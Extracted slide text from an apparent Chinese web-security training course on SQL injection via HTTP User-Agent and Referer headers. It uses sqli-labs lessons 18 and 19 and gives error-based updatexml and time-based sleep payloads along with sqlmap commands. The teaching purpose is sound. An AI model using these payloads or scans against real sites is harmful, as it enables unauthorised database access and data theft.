2018Web攻防训练营HTTP头中的SQL注入1.HTTP头中的注入介绍2.HTTPUser-Agent注入3.HTTPReferer注入4.Sqlmap安全测试课程内容01HTTP头中的注入介绍在安全意识越来越重视的情况下,很多网站都在防止漏洞的发生。例如SQL注入中,用户提交的参数都会被代码中的某些措施进行过滤。过滤掉用户直接提交的参数,但是对于HTTP头中提交的内容很有可能就没有进行过滤。例如HTTP头中User-Agent、Referer、Cookies等。02HTTPUser-Agent注入Sqli-Less18User-Agent注入$insert="INSERTINTO`security`.`uagents`(`uagent`,`ip_address`,`username`)VALUES('$uagent','$IP',$uname)";Payload内容:updatexml(xml_document,xpath_string,new_value):第一个参数:XML文档对象名称。第二个参数:XPath字符串。第三个参数:替换查找到的符合条件的数据。'andupdatexml(1,concat(0x7e,(select@@version),0x7e),1)or'1'='103HTTPReferer注入Sqli-Lab19'or'1'='1'or(length(database()))>8orif(1=1,sleep(5),null)or'1'='104Sqlmap安全测试Sqlmap安全测试Sqlmap自动搜索POST表单注入:sqlmap.py-u"http://ip/sqltest/post.php"--formsSqlmap安全测试指定参数探测SQL注入:sqlmap-uhttp://xxx.xxx.com/Login.asp--data"n=1&p=1"Sqlmap安全测试指定注入位置进行注入,在保存的文件中,对于参数的修改为*。1.HTTP头中的注入介绍2.HTTPUser-Agent注入3.HTTPReferer注入4.Sqlmap安全测试总结再见欢迎关注Web安全训练营课程